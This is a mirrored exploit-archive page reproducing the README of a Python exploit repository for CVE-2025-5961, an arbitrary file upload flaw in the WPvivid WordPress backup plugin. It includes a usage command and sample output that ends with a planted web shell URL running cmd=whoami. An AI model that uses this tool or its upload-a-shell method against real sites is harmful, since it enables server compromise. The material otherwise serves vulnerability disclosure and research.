来源

关联漏洞

描述

Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload

介绍

# 🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload

> 📈 *This vulnerability affects a plugin with over **700,000+ installs***  

---

## 📝 CVE Details

- **CVE:** CVE-2025-5961
- **CVSS:** 7.2 (High)
- **Published:** July 3, 2025

---

## 🔍 Description

The **Migration, Backup, Staging – WPvivid Backup & Migration** plugin for WordPress is vulnerable to **arbitrary file uploads** due to missing file type validation in the `wpvivid_upload_import_files` function in all versions up to, and including, `0.9.116`.

This allows **authenticated attackers (Administrator-level and above)** to upload arbitrary files to the server, potentially enabling remote code execution.



---

## 🧰 Script

This repository contains an exploit script for **CVE-2025-5961**, written in Python, which:
- Checks plugin version.
- Logs in as Administrator.
- Extracts the required nonce from the plugin page.
- Uploads a web shell payload.
- Prints the URL to access the shell.

---

## 🖥️ Example Usage

```bash
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
```

---

## ⚙️ Usage

```text
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD
```

---

## 📊 Output Example

```text
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
```

---

## ⚖️ Disclaimer

This script is provided for **educational and research purposes only**.  
The author is not responsible for any misuse or damage caused by this tool.

---

## ✍️ By

**Khaled Alenazi (Nxploited)**  
🌐 [GitHub](https://github.com/Nxploited/)  

---

文件快照

 [4.0K]  /data/pocs/446db3a8f55426a0861b02d12cf80a51caba1abf
├── [3.5K]  CVE-2025-5961.py
├── [1.1K]  LICENSE
├── [2.3K]  README.md
└── [   9]  requirements.txt

0 directories, 4 files

备注